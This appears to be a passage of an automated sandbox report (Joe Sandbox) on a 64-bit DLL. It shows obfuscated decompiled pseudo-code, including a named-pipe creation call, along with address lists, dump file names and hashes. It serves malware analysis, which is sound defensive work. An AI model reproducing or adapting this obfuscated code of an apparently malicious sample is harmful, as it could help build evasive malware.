                          				 *((long long*)(_t711 + 0x48)) = _t734;
                          				 *(_t711 + 0x40) = 0x913;
                          				r8d = 0x172d;
                          				 *(_t711 + 0x38) = _t742;
                          				 *((long long*)(_t711 + 0x30)) = 0x641;
                          				 *(_t711 + 0x28) = 0x1d5d;
                          				 *(_t711 + 0x20) =  *(0x32c + _t747 * 4) * ( *0x8c0b4133 & 0x000000ff);
                          				_t389 = E00007FF87FF88C08CB60( *(0x32c + _t747 * 4) * ( *0x8c0b4133 & 0x000000ff),  *(__r8 + 0xab0) * 0x1a29,  *_t696, __r8,  *((intOrPtr*)(__r8 +  *_t696 * 4)));
                          				_t743 =  *((intOrPtr*)(_t711 + 0x100));
                          				__r9[_t597] = _t389;
                          				_t533 =  *0x8c0b4158; // 0x0
                          				_t393 =  *0x8c0b4148; // 0x0
                          				 *(_t711 + 0x130) = _t533;
                          				_t650 = _t393 + 4;
                          				 *((intOrPtr*)(_t743 + _t650 * 4)) = r15d;
                          				r9d =  *0x8c0b4168; // 0x0
                          				r8d =  *0x8c0b4148; // 0x0
                          				r9d = r9d + _t533;
                          				r8d = r8d - 1;
                          				 *0x8c0b4148 = r8d;
                          				 *0x8c0b4168 = r9d;
                          				if ( *((intOrPtr*)(_t743 + _t650 * 8)) - ( *(_t747 +  *((intOrPtr*)(_t711 + 0x120))) & 0x000000ff) < 0) goto 0x8c07808e;
                          				_t687 =  *0x8c0b41a0; // 0x0
                          				if ( *((intOrPtr*)(__rcx + _t687 * 4)) - r8d < 0) goto 0x8c078000;
                          				r10d = 0x1e56;
                          				 *((long long*)(_t711 + 0x100)) = _t734;
                          				if ( *((intOrPtr*)(__rcx + r8d * 4)) - _t734 < 0) goto 0x8c077ffd;
                          				_t599 =  *0x8c0b4170; // 0x0
                          				_t725 =  *0x8c0b4158; // 0x0
                          				_t600 = _t599 + 1;
                          				 *0x8c0b4170 = _t600;
                          				if (_t725 - _t600 <= 0) goto 0x8c077ff3;
                          				_t652 = _t600 + _t600 * 2;
                          				if (__r9[_t652] ==  *((intOrPtr*)(__rcx + 0x90 + _t761 * 4))) goto 0x8c077af2;
                          				if ( *((intOrPtr*)(__rcx +  *(_t711 + 0x70) * 4)) - 0x11b0 <= 0) goto 0x8c077af2;
                          				_t688 = _t687 - 1;
                          				 *0x8c0b41a0 = _t688;
                          				if (_t725 - _t652 > 0) goto 0x8c077a41;
                          				_t603 =  *((intOrPtr*)(_t711 + 0x118));
                          				if (0x672 -  *((intOrPtr*)(_t603 + 0x3d74)) < 0) goto 0x8c077a41;
                          				 *(_t755 + _t761 * 8) =  *(_t755 + _t761 * 8) ^ 0x00000507;
                          				 *0x8c0b4133 = ( *0x8c0b4133 & 0x000000ff) * (( *(_t696 + _t761 * 8 - 8) & 0x000000ff) +  *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x120)) + 0xddb)) & 0x000000ff);
                          				goto 0x8c07819f;
                          				_t726 =  *((intOrPtr*)(_t711 + 0x88));
                          				_t762 = _t761 - 1;
                          				r10d =  *(_t711 + 0xf8) & 0x0000ffff;
                          				_t604 = _t688;
                          				__r9[0x20 + _t603 * 4] = _t603 /  *(_t726 +  *__r9 * 8) % __r9[0x20 + _t603 * 4];
                          				 *((intOrPtr*)(0x32c +  *__r9 * 4)) =  *((intOrPtr*)(0x32c +  *__r9 * 4)) + ( *0x8c0b4190 & 0x0000ffff);
                          				_t412 =  *0x8c0b4134; // 0x0
                          				 *0x8c0b4130 =  *0x8c0b4130 | ( *0x8c0b4123 & 0x000000ff) - 0x00000001;
                          				 *(_t755 + _t747 * 4) =  *(_t755 + _t747 * 4) ^ _t412 -  *0x8c0b4180;
                          				_t748 = _t747 + 1;
                          				 *0x8c0b4150 = _t604;
                          				_t658 = _t604 * 4;
                          				 *((intOrPtr*)(__rcx + 0x7574)) =  *((intOrPtr*)(__rcx + 0x7574)) +  *((intOrPtr*)(_t726 + _t658 * 8));
                          				goto 0x8c077f04;
                          				_t706 =  *((intOrPtr*)(_t711 + 0x118));
                          				_t637 =  *((intOrPtr*)(_t711 + 0x68));
                          				asm("cdq");
                          				 *0x8c0b4148 = (_t706[0x877] & 0x0000ffff) % r8d;
                          				 *(_t637 +  *__r9 * 8) = _t658 ^  *(_t637 +  *__r9 * 8) ^ 0x00001fe9;
                          				_t606 =  *0x8c0b4140; // 0x0
                          				 *((intOrPtr*)(_t606 + (_t762 + _t762) * 8)) = 0x109d;
                          				_t502 =  *0x8c0b414c; // 0x0
                          				_t539 =  *0x8c0b4122 & 0x000000ff;
                          				_t503 = _t502 ^ 0x00001dd4;
                          				 *0x8c0b414c = _t503;
                          				if (_t539 - 0xb51 >= 0) goto 0x8c077a39;
                          				if ( *((intOrPtr*)(_t743 + (_t762 + 1 + _t762 + 1) * 8)) - 0x689 >= 0) goto 0x8c077a39;
                          				_t579 = _t539 -  *0x8c0b4123; // 0x0
                          				if (_t579 == 0) goto 0x8c077a39;
                          				if ( *((long long*)(_t637 + 8 + _t762 * 8)) - 0x19b8 >= 0) goto 0x8c077a39;
                          				r8d =  *(_t711 + 0x60);
                          				r9d = r8b & 0xffffffff;
                          				if (r9d !=  *(_t711 + 0x130)) goto 0x8c077df1;
                          				if (( *(_t711 + 0x108) & 0x000000ff) - 0x1825 <= 0) goto 0x8c077df1;
                          				if ( *0x8c0b4194 - 0x23a < 0) goto 0x8c077df1;
                          				_t609 =  *0x8c0b4128; // 0x0
                          				r8b = r8b - 1;
                          				_t735 =  *(_t711 + 0x80);
                          				_t756 =  *((intOrPtr*)(_t711 + 0x128));
                          				 *((long long*)(_t711 + 0x58)) = 0x321;
                          				r8d = r8b & 0xffffffff;
                          				 *((intOrPtr*)(__rcx + (_t735 + _t735 * 2) * 4)) =  *((intOrPtr*)(_t609 + _t503 * 4));
                          				_t610 =  *0x8c0b4188; // 0x0
                          				_t664 =  *0x8c0b4178; // 0x0
                          				_t638 =  *((intOrPtr*)(_t610 + 0x2a1c));
                          				r9d =  *(_t756 + _t610 * 2) & 0x0000ffff;
                          				_t611 =  *0x8c0b41a0; // 0x0
                          				_t423 =  *0x8c0b414c; // 0x0
                          				asm("cdq");
                          				 *(_t711 + 0x50) = _t611;
                          				 *((long long*)(_t711 + 0x48)) = 0x1400;
                          				 *(_t711 + 0x40) = 0xf51;
                          				 *(_t711 + 0x38) = _t664;
                          				 *((long long*)(_t711 + 0x30)) = _t423 % r8d;
                          				 *(_t711 + 0x28) = 0x180d40a;
                          				 *(_t711 + 0x20) = _t706;
                          				_t426 = E00007FF87FF88C08CB60(_t638, _t664, _t735 + _t735 * 2, _t638, _t726 & _t664);
                          				r9d = 0x7c;
                          				 *((intOrPtr*)(__rcx + _t611 * 4)) = _t426;
                          				_t716 =  *0x8c0b4180; // 0x0
                          				r9b = r9b -  *0x8c0b4133;
                          				_t717 = _t716 + 1;
                          				 *0x8c0b4132 = 0x125b % ( *0x8c0b4132 & 0x000000ff);
                          				_t690 =  *0x8c0b4170; // 0x0
                          				 *0x8c0b4180 = _t717;
                          				_t691 = _t690 ^ 0x00000d0b;
                          				 *0x8c0b4148 = 0x1a17;
                          				 *0x8c0b4133 = r9b;
                          				_t612 =  *0x8c0b4128; // 0x0
                          				_t613 =  *0x8c0b4168;
                          				_t702 =  *( *((intOrPtr*)(_t711 + 0x78)) + _t612) ^ _t613;
                          				_t433 =  *0x8c0b4194; // 0x0
                          				_t697 = _t433 -  *(_t711 + 0x130) + 2;
                          				 *_t613 =  *_t613 + 1;
                          				r8d =  *_t613;
                          				r10d =  *0x8c0b4170 & 0x0000ffff;
                          				_t196 = _t717 + 3; // 0x4
                          				_t745 = ( *(_t711 + 0x90))[_t196];
                          				r8d = 0xaf4;
                          				 *(_t711 + 0x40) =  *( *((intOrPtr*)(_t711 + 0x68)) + (_t717 + _t717 * 2) * 8) *  *(_t711 + 0x70);
                          				 *(_t711 + 0x38) = r10w;
                          				 *((long long*)(_t711 + 0x30)) = _t745;
                          				 *(_t711 + 0x28) = _t638;
                          				 *(_t711 + 0x20) = _t697;
                          				_t439 = E00007FF87FF88C0736A0(_t638,  *(__r9 + 8 + _t611 * 4) |  *0x8c0b41a0, _t691, _t697, _t717 + _t717 * 2, _t735, _t760, _t754, _t751);
                          				r10d =  *(_t711 + 0xf8) & 0x0000ffff;
                          				_t618 =  *0x8c0b4138; // 0x0
                          				 *((long long*)(_t618 + 0x30 + _t735 * 8)) = _t439;
                          				 *0x8c0b4122 = 0x22;
                          				 *((short*)(_t756 + 8 + _t762 * 8)) =  *0x8c0b4133 & 0x000000ff;
                          				_t763 = _t762 + 2;
                          				_t757 =  *((intOrPtr*)(_t711 + 0x110));
                          				goto 0x8c077f04;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x78)) + _t745)) - ( *(_t711 + 0xf8) & 0x0000ffff) >= 0) goto 0x8c077f58;
                          				asm("cdq");
                          				 *((_t748 + 1 << 4) + 0xb65) = 0x1d5d %  *((_t748 + 1 << 4) + 0xb65);
                          				 *(_t757 + 0x4e00) =  *(_t757 + 0x4e00) &  *0x8c0b416c & 0x0000ffff;
                          				_t719 =  *0x8c0b4160; // 0x0
                          				asm("cdq");
                          				 *(_t719 + _t763) = 0xfffffcfa / ( *(_t719 + _t763) & 0x000000ff);
                          				_t620 =  *0x8c0b4128; // 0x0
                          				 *0x8c0b4132 = 0x80;
                          				if (r9d -  *((intOrPtr*)(_t620 +  *_t697 * 4)) >= 0) goto 0x8c077ef3;
                          				 *(_t702 + 4 + _t763 * 4) =  *(_t702 + 4 + _t763 * 4) & r9d;
                          				_t512 =  *(_t757 + 0x13800);
                          				if (_t512 - ( *0x8c0b4130 & 0x0000ffff) > 0) goto 0x8c077edc;
                          				r11d = bpl & 0xffffffff;
                          				r11d = r11d - r9d;
                          				 *(0x32c + _t702 * 4) =  *(0x32c + _t702 * 4) * r9d;
                          				asm("cdq");
                          				r8d = r11d / _t512;
                          				_t622 =  *0x8c0b41a0; // 0x0
                          				 *(_t702 + 8 + _t622 * 4) = r8d;
                          				if (_t512 + 1 - ( *0x8c0b4130 & 0x0000ffff) <= 0) goto 0x8c077eb0;
                          				r9d = r9d + 1;
                          				_t623 =  *0x8c0b4128; // 0x0
                          				if (r9d -  *((intOrPtr*)(_t623 +  *_t697 * 4)) < 0) goto 0x8c077e80;
                          				_t640 =  *((intOrPtr*)(_t711 + 0x100));
                          				r10d =  *(_t711 + 0xf8) & 0x0000ffff;
                          				_t720 =  *0x8c0b4138; // 0x0
                          				_t765 = _t763 - 1 << 5;
                          				 *(_t720 + _t765) =  *(_t720 + _t765) & _t691;
                          				_t515 =  *0x8c0b4150; // 0x0
                          				 *((intOrPtr*)(_t757 + (_t748 + _t748 * 2) * 4)) = _t515 -  *((intOrPtr*)(_t757 + (_t748 + _t748 * 2) * 4));
                          				_t675 =  *0x8c0b4138; // 0x0
                          				 *(_t675 + 0x98 + _t748 * 8) =  *(_t675 + 0x98 + _t748 * 8) | 0x00001d60;
                          				goto 0x8c07819f;
                          				r8b = r8b - 1;
                          				_t626 =  *0x8c0b4148;
                          				 *(__rcx + _t626 * 4) =  *((intOrPtr*)(0x32c +  *0x8c0b4124 * 4)) - 0x000002a3 & r10d;
                          				_t693 = ( *0x452a & 0x000000ff) - (0x909243fb * ( *0x452a & 0x000000ff) >> 0x20 >> 0xc) * 0x1c55;
                          				 *(_t745 + 0x4e10) =  *(_t640 + 0x2e78) *  *0x2a0c;
                          				 *(_t640 + _t626 * 8) =  *(_t640 + _t626 * 8) & _t626;
                          				_t464 =  *0x8c0b4148; // 0x0
                          				 *((intOrPtr*)(_t745 + (_t464 + 0xc) * 4)) =  *((intOrPtr*)(_t745 + (_t464 + 0xc) * 4)) + ( *(_t711 + 0xf0) & 0x000000ff);
                          				 *((intOrPtr*)(_t745 + 0x4e1c)) =  *((intOrPtr*)(_t745 + 0x4e1c)) + 0x1bcb;
                          				goto 0x8c07819f;
                          				goto 0x8c078000;
                          				 *(__rcx + 0x19cc) =  *(__rcx + 0x19cc) * 0x81c;
                          				r8d =  *0x8c0b4190 & 0x0000ffff;
                          				_t749 = _t693;
                          				if (r8d - ( *(_t711 + 0xf0) & 0x000000ff) <= 0) goto 0x8c077efb;
                          				_t627 =  *0x8c0b4128; // 0x0
                          				 *0x8c0b4132 = r8b;
                          				r8d = r8d + 1;
                          				if (r8d - ((bpl & 0xffffffff) +  *((intOrPtr*)(_t627 + (_t693 + _t693 * 2) * 4 + 0x1c)) & 0x000000ff) > 0) goto 0x8c078070;
                          				goto 0x8c077efb;
                          				r14d =  *0x8c0b4132 & 0x000000ff;
                          				_t629 =  *0x8c0b4188; // 0x0
                          				r15d = 0x1e57;
                          				_t630 =  *0x8c0b4170; // 0x0
                          				r11d =  *(0xb65 + _t630 * 4) & 0x0000ffff;
                          				_t631 = r8d;
                          				r8d =  *0x3c9d & 0x000000ff;
                          				r9d =  *(0xb65 + _t631 * 4);
                          				r9d = r9d + r8d;
                          				r8d =  *(_t711 + 0xf0) & 0x000000ff;
                          				r8d = 0x5a2058;
                          				 *(_t711 + 0x40) = r9d;
                          				 *(_t711 + 0x38) = r11w;
                          				 *((long long*)(_t711 + 0x30)) =  *((intOrPtr*)(_t629 + 8 + (_t765 + _t765) * 8));
                          				 *(_t711 + 0x28) = _t697;
                          				 *(_t711 + 0x20) = _t697[ *(_t711 + 0x80)] - ( *(_t711 + 0x60) & 0x000000ff);
                          				 *0x8c0b4148 = E00007FF87FF88C0736A0( *((intOrPtr*)(_t629 + 8 + (_t765 + _t765) * 8)), _t757 | 0x00001b57, _t627 + (_t693 + _t693 * 2) * 4, _t697, _t720, r9d, _t746, _t695, _t699);
                          				 *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x68)) + (_t749 + 0xe + _t749 + 0xe) * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x68)) + (_t749 + 0xe + _t749 + 0xe) * 8)) + _t631;
                          				 *(__rcx + 0x19e0) =  *(__rcx + 0x19e0) |  *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x88)) + 0xaa10)) + 0x0000161d;
                          				 *((short*)( *((intOrPtr*)(_t711 + 0x128)) + 0x34 + _t749 * 2)) = ( *(_t711 + 0x90))[0x13d7] & 0x0000ffff;
                          				return r15d;
                          			}






























































































                          0x7ff88c0776e0
                          0x7ff88c0776e5
                          0x7ff88c0776f6
                          0x7ff88c077707
                          0x7ff88c07771c
                          0x7ff88c077724
                          0x7ff88c07772c
                          0x7ff88c077733
                          0x7ff88c077741
                          0x7ff88c07774d
                          0x7ff88c077755
                          0x7ff88c077765
                          0x7ff88c07776c
                          0x7ff88c077773
                          0x7ff88c077776
                          0x7ff88c07777d
                          0x7ff88c077782
                          0x7ff88c077789
                          0x7ff88c077797
                          0x7ff88c0777a2
                          0x7ff88c0777ad
                          0x7ff88c0777bc
                          0x7ff88c0777c3
                          0x7ff88c0777ca
                          0x7ff88c0777d7
                          0x7ff88c0777df
                          0x7ff88c0777ea
                          0x7ff88c0777f2
                          0x7ff88c0777fa
                          0x7ff88c0777ff
                          0x7ff88c07780b
                          0x7ff88c07781a
                          0x7ff88c07781f
                          0x7ff88c077831
                          0x7ff88c077838
                          0x7ff88c077851
                          0x7ff88c077854
                          0x7ff88c077859
                          0x7ff88c077865
                          0x7ff88c07786a
                          0x7ff88c077875
                          0x7ff88c07787c
                          0x7ff88c077880
                          0x7ff88c077894
                          0x7ff88c077899
                          0x7ff88c0778a2
                          0x7ff88c0778a7
                          0x7ff88c0778b0
                          0x7ff88c0778b6
                          0x7ff88c0778bb
                          0x7ff88c0778c4
                          0x7ff88c0778cd
                          0x7ff88c0778dd
                          0x7ff88c0778e2
                          0x7ff88c0778f5
                          0x7ff88c0778f8
                          0x7ff88c0778fe
                          0x7ff88c077907
                          0x7ff88c07790e
                          0x7ff88c077911
                          0x7ff88c077915
                          0x7ff88c07791c
                          0x7ff88c077923
                          0x7ff88c07792e
                          0x7ff88c077939
                          0x7ff88c077940
                          0x7ff88c077950
                          0x7ff88c077956
                          0x7ff88c077962
                          0x7ff88c077968
                          0x7ff88c077971
                          0x7ff88c077981
                          0x7ff88c077987
                          0x7ff88c07798e
                          0x7ff88c077995
                          0x7ff88c077998
                          0x7ff88c0779a2
                          0x7ff88c0779b0
                          0x7ff88c0779bf
                          0x7ff88c0779d3
                          0x7ff88c0779e1
                          0x7ff88c0779e4
                          0x7ff88c0779f2
                          0x7ff88c0779f4
                          0x7ff88c077a08
                          0x7ff88c077a0a
                          0x7ff88c077a33
                          0x7ff88c077a3c
                          0x7ff88c077a45
                          0x7ff88c077a4d
                          0x7ff88c077a50
                          0x7ff88c077a8d
                          0x7ff88c077a95
                          0x7ff88c077aa2
                          0x7ff88c077aa9
                          0x7ff88c077ab5
                          0x7ff88c077abc
                          0x7ff88c077ac8
                          0x7ff88c077acb
                          0x7ff88c077adf
                          0x7ff88c077ae6
                          0x7ff88c077aed
                          0x7ff88c077af2
                          0x7ff88c077afa
                          0x7ff88c077b06
                          0x7ff88c077b0a
                          0x7ff88c077b25
                          0x7ff88c077b2c
                          0x7ff88c077b36
                          0x7ff88c077b3d
                          0x7ff88c077b43
                          0x7ff88c077b4a
                          0x7ff88c077b50
                          0x7ff88c077b5c
                          0x7ff88c077b71
                          0x7ff88c077b77
                          0x7ff88c077b7d
                          0x7ff88c077b8c
                          0x7ff88c077b92
                          0x7ff88c077b97
                          0x7ff88c077ba3
                          0x7ff88c077bb6
                          0x7ff88c077bc6
                          0x7ff88c077bcc
                          0x7ff88c077bd3
                          0x7ff88c077bd6
                          0x7ff88c077bde
                          0x7ff88c077bf1
                          0x7ff88c077bfe
                          0x7ff88c077c05
                          0x7ff88c077c0a
                          0x7ff88c077c11
                          0x7ff88c077c1e
                          0x7ff88c077c2d
                          0x7ff88c077c32
                          0x7ff88c077c3d
                          0x7ff88c077c4e
                          0x7ff88c077c5c
                          0x7ff88c077c61
                          0x7ff88c077c6a
                          0x7ff88c077c73
                          0x7ff88c077c86
                          0x7ff88c077c8b
                          0x7ff88c077c94
                          0x7ff88c077c99
                          0x7ff88c077ca5
                          0x7ff88c077caf
                          0x7ff88c077cc0
                          0x7ff88c077cc7
                          0x7ff88c077cce
                          0x7ff88c077cd8
                          0x7ff88c077cde
                          0x7ff88c077ce5
                          0x7ff88c077cec
                          0x7ff88c077cf3
                          0x7ff88c077cfd
                          0x7ff88c077d17
                          0x7ff88c077d29
                          0x7ff88c077d30
                          0x7ff88c077d33
                          0x7ff88c077d43
                          0x7ff88c077d4b
                          0x7ff88c077d4d
                          0x7ff88c077d50
                          0x7ff88c077d58
                          0x7ff88c077d67
                          0x7ff88c077d84
                          0x7ff88c077d8d
                          0x7ff88c077d92
                          0x7ff88c077d98
                          0x7ff88c077d9d
                          0x7ff88c077da2
                          0x7ff88c077da7
                          0x7ff88c077dac
                          0x7ff88c077dc0
                          0x7ff88c077dc7
                          0x7ff88c077dd3
                          0x7ff88c077dda
                          0x7ff88c077de0
                          0x7ff88c077de4
                          0x7ff88c077dec
                          0x7ff88c077e02
                          0x7ff88c077e12
                          0x7ff88c077e1d
                          0x7ff88c077e2a
                          0x7ff88c077e36
                          0x7ff88c077e3d
                          0x7ff88c077e45
                          0x7ff88c077e49
                          0x7ff88c077e50
                          0x7ff88c077e5e
                          0x7ff88c077e80
                          0x7ff88c077e8b
                          0x7ff88c077e98
                          0x7ff88c077e9a
                          0x7ff88c077ea6
                          0x7ff88c077eb7
                          0x7ff88c077ebd
                          0x7ff88c077ec2
                          0x7ff88c077ec5
                          0x7ff88c077ecc
                          0x7ff88c077eda
                          0x7ff88c077edf
                          0x7ff88c077ee2
                          0x7ff88c077ef1
                          0x7ff88c077ef3
                          0x7ff88c077efb
                          0x7ff88c077f0b
                          0x7ff88c077f17
                          0x7ff88c077f2e
                          0x7ff88c077f36
                          0x7ff88c077f3e
                          0x7ff88c077f40
                          0x7ff88c077f47
                          0x7ff88c077f53
                          0x7ff88c077f5f
                          0x7ff88c077f69
                          0x7ff88c077f79
                          0x7ff88c077fa6
                          0x7ff88c077fa9
                          0x7ff88c077fce
                          0x7ff88c077fd1
                          0x7ff88c077fdf
                          0x7ff88c077fe3
                          0x7ff88c077fee
                          0x7ff88c077ffb
                          0x7ff88c07800b
                          0x7ff88c07801c
                          0x7ff88c078053
                          0x7ff88c078059
                          0x7ff88c07805f
                          0x7ff88c078074
                          0x7ff88c07807e
                          0x7ff88c078087
                          0x7ff88c078089
                          0x7ff88c0780a5
                          0x7ff88c0780cf
                          0x7ff88c0780db
                          0x7ff88c0780e1
                          0x7ff88c0780e8
                          0x7ff88c0780f1
                          0x7ff88c0780f4
                          0x7ff88c0780fd
                          0x7ff88c078108
                          0x7ff88c07810b
                          0x7ff88c07811a
                          0x7ff88c078120
                          0x7ff88c078128
                          0x7ff88c078130
                          0x7ff88c078135
                          0x7ff88c07813a
                          0x7ff88c07814e
                          0x7ff88c078160
                          0x7ff88c078178
                          0x7ff88c078196
                          0x7ff88c0781b2

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID: X Z
                          • API String ID: 0-2211723858
                          • Opcode ID: 827fdf0af26fc57b60e32c1447e2fb47698a2641ae8370e9671a321f5b191396
                          • Instruction ID: cc84f5a5ef3b96b77e1f8d42cca3a6ab7d8e20ee82e76d5212509d0360d31e1d
                          • Opcode Fuzzy Hash: 827fdf0af26fc57b60e32c1447e2fb47698a2641ae8370e9671a321f5b191396
                          • Instruction Fuzzy Hash: 6A52D432A0868186EB64CF59F8907B97BA4F75ABC1F014136EA8D87768DF3CE550DB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 50%
                          			E00007FF87FF88C08ED60(void* __ecx, signed int __edx, void* __esp, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, signed int _a8, signed int _a16, long long _a24, signed int _a32, intOrPtr _a48, signed int _a56, signed int _a72, signed int* _a96, signed int _a104) {
                          				long long _v72;
                          				signed int _v80;
                          				signed int _v88;
                          				signed int _v96;
                          				long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				signed int _t121;
                          				void* _t125;
                          				signed int _t129;
                          				void* _t158;
                          				signed int _t160;
                          				signed long long _t182;
                          				signed int* _t191;
                          				signed long long _t197;
                          				signed long long _t198;
                          				signed int _t206;
                          				signed int _t209;
                          				void* _t212;
                          				signed long long _t214;
                          				signed long long _t221;
                          				signed long long _t223;
                          				void* _t225;
                          				void* _t227;
                          				void* _t230;
                          				void* _t231;
                          				void* _t232;
                          
                          				_t227 = __r10;
                          				_a32 = r9d;
                          				r9d = _a104;
                          				r14d = __r8 - 0x216;
                          				r8d = _a56;
                          				r15d = __rdx - 0x25a;
                          				_a8 = __rdx - 0x228c;
                          				r10d = __r9 - 0x2f8;
                          				r8d = r8d + 0xde3;
                          				_a32 = r10d;
                          				_t158 = _a48 + 0xffffc81f;
                          				_a72 = r8d;
                          				r13d = __edx;
                          				r12d = __rax - 0x8d0;
                          				_t160 = __rax - 0x278;
                          				_a16 = r12d;
                          				if (_t158 == _t232 + 0x21a) goto 0x8c08f139;
                          				_a24 = __rbx;
                          				_t191 = _a96;
                          				if (_t158 - __r9 - 0x4c0 >= 0) goto 0x8c08eef0;
                          				if (r15d == _t212 - 0xfa) goto 0x8c08eef0;
                          				r8d =  *(_t191[0x34] + 0x54);
                          				E00007FF87FF88C07BFF0(__ecx, __rcx - 0x108, _t158, __esp, _t191[0x30], _t191[0x22], _t212, _t214, __r8);
                          				r9d = _t191[0x2e];
                          				r9d = r9d - 0x13eb;
                          				_t125 =  *((intOrPtr*)(_t191[0x72] + 0xb8)) - 0x13eb;
                          				if (_t125 - __r9 > 0) goto 0x8c08eea1;
                          				_t221 = _t191[0x78] ^ 0x0000329d;
                          				asm("o16 nop [eax+eax]");
                          				if (_t125 + 1 - __r9 <= 0) goto 0x8c08ee90;
                          				_t191[8] = _t191[8] + _t221;
                          				_t182 = _t191[0x68];
                          				_t206 = _t191[0x10];
                          				r8d = _a72;
                          				r10d = _a32;
                          				_t197 =  *(_t182 + 0x150) ^  *(_t206 + 0x198) ^ 0x00003666;
                          				 *(_t206 + 0x198) = _t197;
                          				_t191[0x12] = _t182 * 0x1f2c;
                          				if (r8d - _t230 + 0x55e >= 0) goto 0x8c08eff2;
                          				if (0 - _t191[0x3e] >= 0) goto 0x8c08f131;
                          				asm("o16 nop [eax+eax]");
                          				_t223 =  *_t191;
                          				r8d = 0x3595;
                          				if (( *(_t223 + 0x130) ^ 0x00001662) == r8d) goto 0x8c08ef68;
                          				r8d = r8d + 1;
                          				_t191[0x78] = _t191[0x78] - 0x469b;
                          				_t198 = _t197 ^ 0x00001662;
                          				if (r8d != _t198) goto 0x8c08ef41;
                          				r9d = _t191[0x4c] * 0x550e2718;
                          				_t191[0x78] = _t191[0x78] * 0x3882;
                          				_t209 = _t191[0x42];
                          				_t225 = _t223 * _t214 + _t209;
                          				if (( !(_t198 - 1) &  *((intOrPtr*)(_t209 + 0x10)) - 0x00000001 +  *((intOrPtr*)(_t191[0x34] + 0x3c))) == 0) goto 0x8c08efd9;
                          				if ( *((intOrPtr*)(_t225 + 0x14)) == 0) goto 0x8c08efd9;
                          				_t129 =  *(_t225 + 0x10);
                          				if (_t129 == 0) goto 0x8c08efd9;
                          				r8d = _t129;
                          				E00007FF87FF88C07BFF0( *((intOrPtr*)(_t225 + 0xc)), 0, 0, __esp, _t198 + _t191[0x30], _t209 + _t191[0x22], _t212, _t214, _t221);
                          				if (1 - (_t191[0x3e] & 0x0000ffff) < 0) goto 0x8c08ef20;
                          				goto 0x8c08f131;
                          				if (_t191[0x70] - 1 >= 0) goto 0x8c08f131;
                          				r13d = _a8;
                          				_v72 = _t231 + 0x4ac1 + _t160;
                          				r12d = 0;
                          				_a72 = (_t160 | r13d) + 0xffffdfce;
                          				r12d = r12d & r14d;
                          				r14d = _a72;
                          				r15d = r15d & _t160;
                          				_a104 = _t227 - 0x2103;
                          				r9d = _t191[0x54];
                          				r8d = _t191[0x4c];
                          				r8d = r8d & _t160;
                          				_v96 = r13d - _t191[0x50];
                          				r9d = r9d * _t160;
                          				_v104 = (_t221 + 0x3a59) * r10d;
                          				CreateNamedPipeA(??, ??, ??, ??, ??, ??, ??, ??);
                          				r8d =  *_t191;
                          				r8d = r8d & _t191[0x6c];
                          				_v80 = r12d;
                          				_t191[0x2c] = _t191[0x2c] + _t191[0x70] - _t160 + _t191[0x8c];
                          				_v88 = _t191[0x16] | 0x0000228c;
                          				_v96 = r15d;
                          				_v104 = _t191[0x48] + 0xffffc919 + r13d;
                          				_t121 = E00007FF87FF88C078BF0(_a104, r8d & _t191[0x78] ^ 0x0000228c, _t191[0x70] - _t160 + _t191[0x8c], _t191, _t160, _t231 + 0x4ac1 + _t160, _t221, _t191, _t231 + 0x4ac1 + _t160);
                          				r10d = _a32;
                          				r8d = _t121;
                          				if (_t212 - 1 != 0) goto 0x8c08f060;
                          				r12d = _a16;
                          				return _t230 - 0x1086;
                          			}






























                          0x7ff88c08ed60
                          0x7ff88c08ed60
                          0x7ff88c08ed74
                          0x7ff88c08ed7c
                          0x7ff88c08ed83
                          0x7ff88c08ed98
                          0x7ff88c08ed9f
                          0x7ff88c08edb3
                          0x7ff88c08edba
                          0x7ff88c08edc1
                          0x7ff88c08edc9
                          0x7ff88c08edcf
                          0x7ff88c08edd7
                          0x7ff88c08edda
                          0x7ff88c08ede1
                          0x7ff88c08ede7
                          0x7ff88c08edf8
                          0x7ff88c08ee05
                          0x7ff88c08ee0d
                          0x7ff88c08ee17
                          0x7ff88c08ee26
                          0x7ff88c08ee41
                          0x7ff88c08ee45
                          0x7ff88c08ee51
                          0x7ff88c08ee58
                          0x7ff88c08ee65
                          0x7ff88c08ee71
                          0x7ff88c08ee7e
                          0x7ff88c08ee85
                          0x7ff88c08ee9b
                          0x7ff88c08ee9d
                          0x7ff88c08eea1
                          0x7ff88c08eea8
                          0x7ff88c08eeac
                          0x7ff88c08eeb4
                          0x7ff88c08eeca
                          0x7ff88c08eed1
                          0x7ff88c08eeec
                          0x7ff88c08eefb
                          0x7ff88c08ef0a
                          0x7ff88c08ef16
                          0x7ff88c08ef20
                          0x7ff88c08ef23
                          0x7ff88c08ef38
                          0x7ff88c08ef48
                          0x7ff88c08ef4b
                          0x7ff88c08ef59
                          0x7ff88c08ef66
                          0x7ff88c08ef73
                          0x7ff88c08ef7e
                          0x7ff88c08ef8c
                          0x7ff88c08ef9a
                          0x7ff88c08efab
                          0x7ff88c08efb3
                          0x7ff88c08efb5
                          0x7ff88c08efbb
                          0x7ff88c08efbd
                          0x7ff88c08efd4
                          0x7ff88c08efe7
                          0x7ff88c08efed
                          0x7ff88c08f000
                          0x7ff88c08f00f
                          0x7ff88c08f026
